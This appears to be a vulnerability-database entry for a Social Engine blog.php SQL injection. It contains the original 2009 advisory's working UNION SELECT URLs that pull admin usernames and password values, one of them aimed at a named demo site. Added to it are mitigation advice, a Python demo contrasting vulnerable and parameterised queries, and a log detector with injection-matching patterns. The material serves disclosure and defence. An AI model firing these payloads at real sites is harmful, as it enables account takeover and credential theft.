Vendor: Social Engine
Discovered by: Snakespc
CVSS: 7.5 (HIGH)
CWE: SQL Injection
Product Name: Social Engine
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Social Engine (blog.php) SQL Injection Vulnerability

Social Engine's blog.php is vulnerable to SQL injection: values taken from the URL query string are placed into a database query without validation or escaping. The summary attributes the flaw to the 'user' parameter; the proof-of-concept in the raw advisory below sends its UNION SELECT payload in the accompanying 'category_id' parameter of the same blog.php request.

Mitigation:

The vendor should release a patch or update to fix this vulnerability; none is recorded here (Patch Exists: NO). In the meantime, site operators can reduce the risk by having blog.php pass request parameters to the database through prepared statements with bound parameters rather than string concatenation, by casting numeric parameters such as category_id to an integer before they reach the query, and by rejecting requests whose parameters carry SQL keywords or comment sequences, either in the application or at a web application firewall.
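The following is an added example, not code from the advisory or from Social Engine. It reproduces the failure class described above against an in-memory SQLite database: a blog query that interpolates the category_id parameter into SQL lets a UNION SELECT pull rows from an unrelated admin table, while the parameterised version with an integer cast returns nothing for the same input. The table se_blog, its columns, and the sample rows are constructed for this example; only se_admins, admin_username and admin_password come from the advisory's payload, and the payload is adapted to SQLite syntax (|| instead of MySQL's concat).

```python
"""Vulnerable versus hardened query construction (added example).

The schema and rows are constructed for illustration and are not
Social Engine's real schema.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample data: two blog posts and one admin record.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE se_blog (blog_id INTEGER, username TEXT, category_id INTEGER, title TEXT);
        INSERT INTO se_blog VALUES (1, 'alice', 5, 'First post');
        INSERT INTO se_blog VALUES (2, 'alice', 7, 'Second post');
        CREATE TABLE se_admins (admin_username TEXT, admin_password TEXT);
        INSERT INTO se_admins VALUES ('admin', 'hash-placeholder');
        """
    )
    return conn


def blog_posts_vulnerable(conn: sqlite3.Connection, user: str, category_id: str) -> list:
    # Vulnerable pattern: request parameters are concatenated into the statement,
    # so category_id can append a UNION that selects from any table.
    sql = (
        "SELECT blog_id, username, category_id, title FROM se_blog "
        f"WHERE username = '{user}' AND category_id = {category_id}"
    )
    return conn.execute(sql).fetchall()


def blog_posts_fixed(conn: sqlite3.Connection, user: str, category_id: str) -> list:
    # Hardened pattern: the numeric parameter must parse as an integer, and both
    # values are bound as parameters so they can never alter the SQL structure.
    try:
        cid = int(category_id)
    except ValueError:
        return []  # anything that is not a plain integer is rejected
    sql = (
        "SELECT blog_id, username, category_id, title FROM se_blog "
        "WHERE username = ? AND category_id = ?"
    )
    return conn.execute(sql, (user, cid)).fetchall()


# Payload shaped like the advisory's: a negative id that matches no post, then a
# UNION padded to the same column count, adapted to SQLite string concatenation.
PAYLOAD = "-5 UNION SELECT 1, 2, 3, admin_username || ':' || admin_password FROM se_admins"


def demo():
    """Return (rows leaked by the vulnerable query, rows from the fixed query
    for the same payload, rows from the fixed query for a legitimate id)."""
    conn = build_db()
    leaked = blog_posts_vulnerable(conn, "alice", PAYLOAD)
    safe = blog_posts_fixed(conn, "alice", PAYLOAD)
    normal = blog_posts_fixed(conn, "alice", "5")
    return leaked, safe, normal


if __name__ == "__main__":
    leaked, safe, normal = demo()
    print("vulnerable query returned:", leaked)
    print("fixed query, same payload:", safe)
    print("fixed query, category 5:  ", normal)
```

The integer cast is what closes this particular hole: once category_id can only ever be a number, there is no position in the statement where an injected keyword can land, and binding the remaining string parameter covers the 'user' value the summary names.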

Exploit-DB raw data:

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	             Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =                                                                                   
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members 
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

# milw0rm.com [2009-01-28]
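As an added example that is not part of the advisory, the check below scans web-server access-log lines for the request shape shown in the proof-of-concept URL above: a blog.php request whose category_id is not a plain integer or whose parameters carry UNION SELECT, a comment opener or a quote-OR-quote fragment once the query string is decoded. The log lines are constructed for this example (192.0.2.0/24 is a documentation range); the Apache combined-log layout is assumed.

```python
"""Access-log detector for the blog.php injection pattern (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style log lines, not real traffic. Line 2 carries the
# advisory's proof-of-concept payload; line 4 carries a different classic probe.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Jan/2009:10:00:01 +0000] "GET /blog.php?user=alice&category_id=5 HTTP/1.1" 200 5120
192.0.2.11 - - [28/Jan/2009:10:00:02 +0000] "GET /blog.php?user=darkthronex&category_id=-5+UNION%20SELECT%201,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/* HTTP/1.1" 200 6010
192.0.2.12 - - [28/Jan/2009:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 1200
192.0.2.13 - - [28/Jan/2009:10:00:04 +0000] "GET /blog.php?user=bob&category_id=7%27%20or%20%271%27=%271 HTTP/1.1" 200 5200
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Markers checked against each decoded parameter value: UNION [ALL] SELECT,
# a block-comment opener, a line comment, or a quote/OR/quote fragment.
SQLI_RE = re.compile(r"union\s+(all\s+)?select|/\*|--\s|'\s*or\s+'", re.IGNORECASE)


def inspect_line(line: str):
    """Return a list of reasons the request looks injected, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/blog.php":
        return None
    # parse_qs already percent-decodes and turns '+' into spaces.
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    reasons = []
    cid = params.get("category_id", "")
    if cid and not re.fullmatch(r"-?\d+", cid):
        reasons.append("category_id is not a plain integer")
    for name, value in params.items():
        if SQLI_RE.search(value):
            reasons.append(f"SQL keywords in {name}")
    return reasons or None


def scan(log_text: str) -> list:
    """Return (client_ip, reasons) for every suspicious blog.php request."""
    hits = []
    for line in log_text.splitlines():
        reasons = inspect_line(line)
        if reasons:
            hits.append((line.split(" ", 1)[0], reasons))
    return hits


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

The integer check on category_id is the higher-signal rule of the two: it has no keyword list to evade and mirrors the cast the application itself should perform, so a match means the request could only have been intended to reach the query as SQL.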